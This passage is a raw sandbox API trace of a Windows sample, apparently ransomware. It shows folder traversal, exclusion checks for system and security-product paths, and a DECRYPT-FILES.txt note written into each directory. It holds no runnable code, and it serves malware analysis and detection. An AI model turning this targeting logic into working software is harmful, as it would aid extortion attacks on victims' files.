ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.551] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.552] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.552] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.552] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.552] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.552] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.552] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0078.552] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.552] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0078.552] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\jkbimi8.tmp" [0078.552] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.552] CloseHandle (hObject=0x0) returned 0 [0078.552] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.553] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.553] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0078.553] CloseHandle (hObject=0x458) returned 1 [0078.553] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0078.553] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0078.553] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0078.553] lstrcatW (in: lpString1="CTLs", lpString2="\\" | out: lpString1="CTLs\\") returned="CTLs\\" [0078.553] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CTLs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Program Files") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch=":\\Windows") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Games\\") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\All Users") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.553] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="AhnLab") returned 0x0 [0078.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0078.554] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.554] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\jkbimi8.tmp") returned 95 [0078.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0078.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0078.554] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.554] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\DECRYPT-FILES.txt") returned 101 [0078.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0078.554] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0078.555] CloseHandle (hObject=0x45c) returned 1 [0078.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0078.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0078.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0078.556] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.556] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.556] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.556] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.556] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.556] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.556] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.556] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.556] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.556] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.556] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.556] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.556] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0078.556] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.556] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0078.557] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\jkbimi8.tmp" [0078.557] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.557] CloseHandle (hObject=0x0) returned 0 [0078.557] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.557] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab03f580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab03f580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.557] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0078.557] CloseHandle (hObject=0x458) returned 1 [0078.558] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab03f580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.558] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.558] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.558] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.558] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.558] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.558] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.558] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.558] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.558] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0078.558] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.558] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0078.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\jkbimi8.tmp" [0078.559] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.559] CloseHandle (hObject=0x0) returned 0 [0078.559] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.559] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab019420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab019420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab019420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.559] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0078.559] CloseHandle (hObject=0x450) returned 1 [0078.560] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My\\", cAlternateFileName="")) returned 0 [0078.560] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.560] CloseHandle (hObject=0x448) returned 1 [0078.560] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x2795d470, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x2795d470, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0078.560] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0078.560] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0078.560] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0078.560] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Program Files") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch=":\\Windows") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Games\\") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\All Users") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="AhnLab") returned 0x0 [0078.560] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0078.560] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.560] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\\\jkbimi8.tmp") returned 78 [0078.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\\\jkbimi8.tmp" (normalized: 